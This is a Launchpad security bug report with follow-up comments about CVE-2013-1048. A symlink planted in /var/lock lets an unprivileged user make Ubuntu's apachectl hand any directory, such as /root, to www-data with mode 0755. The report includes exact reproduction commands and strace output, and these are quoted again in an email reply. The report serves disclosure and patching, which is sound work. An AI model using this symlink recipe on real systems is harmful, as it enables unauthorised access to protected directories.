/usr/sbin/apachectl privilege escalation

Bug #1104049 reported by Hayawardh Vijayakumar on 2013-01-24
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
apache2 (Ubuntu)
Low
Unassigned

Bug Description

Dear all,

The /usr/sbin/apachectl script allows unprivileged local users to change the permissions of any directory to 0755 and in addition make the user www-data its owner.

The script has a line:

start)
            ...
            install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}

Since in Ubuntu the /var/lock directory has world-writable permissions, a user can create a symbolic link to any directory. An administrator then starts Apache through /etc/init.d/apache2, which in turn calls the script /usr/sbin/apachectl which will change the permissions of the directory pointed to by the symbolic link to 0755 and in addition, make the user www-data its owner.

Details:
=====
root@u32d:~# apt-cache policy apache2.2-common
apache2.2-common:
  Installed: 2.2.22-1ubuntu1
  Candidate: 2.2.22-1ubuntu1.2
  Version table:
     2.2.22-1ubuntu1.2 0
        500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main i386 Packages
        500 http://security.ubuntu.com/ubuntu/ precise-security/main i386 Packages
 *** 2.2.22-1ubuntu1 0
        500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386 Packages
        100 /var/lib/dpkg/status

root@u32d:~# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04

Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable to Quantal 12.10):

As an untrusted user, create a symbolic link in /var/lock to a directory the user does not have read/search permission (e.g., /root):

hayawardh@u32d:~$ ls -ld /root
drwx------. 14 root root 4096 Jan 24 08:23 /root

hayawardh@u32d:~$ cd /var/lock
hayawardh@u32d:/var/lock$ ln -s /root apache2

Wait for the administrator to start Apache

root@u32d:~# /etc/init.d/apache2 start
 * Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
   ...done.

Now check permissions of /root:
root@u32d:~# ls -ld /root
drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root

Fixing this does not seem straightforward because install opens the file to change permissions (in this case, /var/lock/apache2) without O_NOFOLLOW, and there does not seem to be a command line switch for the same.

Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}

mkdir("/var", 0755) = -1 EEXIST (File exists)
chdir("/var") = 0
mkdir("lock", 0755) = -1 EEXIST (File exists)
chdir("lock") = 0
mkdir("apache2", 0700) = -1 EEXIST (File exists)
open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
fchown32(3, 33, -1) = 0
fchmod(3, 0755) = 0
close(3) = 0

Thanks,
Hayawardh

CVE References

Seth Arnold (seth-arnold) wrote :

Confirmed, 12.10 dmesg reports:

[ 1602.905898] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.905907] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906352] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906355] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)

Thanks Hayawardh

Changed in apache2 (Ubuntu):
status: New → Confirmed
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2013-1048

Seth Arnold (seth-arnold) wrote :

Hayawardh,

We've contacted the Debian security team, we're coordinating an update with them.

Thanks

Marc Deslauriers (mdeslaur) wrote :

On Ubuntu 10.10 and later this isn't an issue because of Yama sumlink restrictions.
What version of Ubuntu did you try this on?

Download full text (3.8 KiB)

You are right. I had disabled Yama. In any case it would be a problem for
10.04?

Thanks,
Hayawardh
On Jan 25, 2013 3:55 PM, "Marc Deslauriers" <email address hidden>
wrote:

> On Ubuntu 10.10 and later this isn't an issue because of Yama sumlink
> restrictions.
> What version of Ubuntu did you try this on?
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1104049
>
> Title:
> /usr/sbin/apachectl privilege escalation
>
> Status in “apache2” package in Ubuntu:
> Confirmed
>
> Bug description:
> Dear all,
>
> The /usr/sbin/apachectl script allows unprivileged local users to
> change the permissions of any directory to 0755 and in addition make
> the user www-data its owner.
>
> The script has a line:
>
> start)
> ...
> install -d -o ${APACHE_RUN_USER:-www-data}
> ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> Since in Ubuntu the /var/lock directory has world-writable permissions,
> a user can create a symbolic link to any directory. An administrator then
> starts Apache through /etc/init.d/apache2, which in turn calls the script
> /usr/sbin/apachectl which will change the permissions of the directory
> pointed to by the symbolic link to 0755 and in addition, make the user
> www-data its owner.
>
> Details:
> =====
> root@u32d:~# apt-cache policy apache2.2-common
> apache2.2-common:
> Installed: 2.2.22-1ubuntu1
> Candidate: 2.2.22-1ubuntu1.2
> Version table:
> 2.2.22-1ubuntu1.2 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main
> i386 Packages
> 500 http://security.ubuntu.com/ubuntu/ precise-security/main
> i386 Packages
> *** 2.2.22-1ubuntu1 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386
> Packages
> 100 /var/lib/dpkg/status
>
> root@u32d:~# lsb_release -rd
> Description: Ubuntu 12.04 LTS
> Release: 12.04
>
> Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable
> to Quantal 12.10):
>
> As an untrusted user, create a symbolic link in /var/lock to a
> directory the user does not have read/search permission (e.g., /root):
>
> hayawardh@u32d:~$ ls -ld /root
> drwx------. 14 root root 4096 Jan 24 08:23 /root
>
> hayawardh@u32d:~$ cd /var/lock
> hayawardh@u32d:/var/lock$ ln -s /root apache2
>
> Wait for the administrator to start Apache
>
> root@u32d:~# /etc/init.d/apache2 start
> * Starting web server apache2
> apache2: Could not reliably determine the server's fully qualified
> domain name, using 127.0.1.1 for ServerName
> ...done.
>
> Now check permissions of /root:
> root@u32d:~# ls -ld /root
> drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
>
> Fixing this does not seem straightforward because install opens the
> file to change permissions (in this case, /var/lock/apache2) without
> O_NOFOLLOW, and there does not seem to be a command line switch for
> the same.
>
> Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-
> data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> mkdir("/var", 0755) = -1 EEXIST (File exists)
...

Read more...

information type: Private Security → Public Security
Luke Faraone (lfaraone) on 2013-09-29
Changed in apache2 (Ubuntu):
importance: Undecided → Low
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers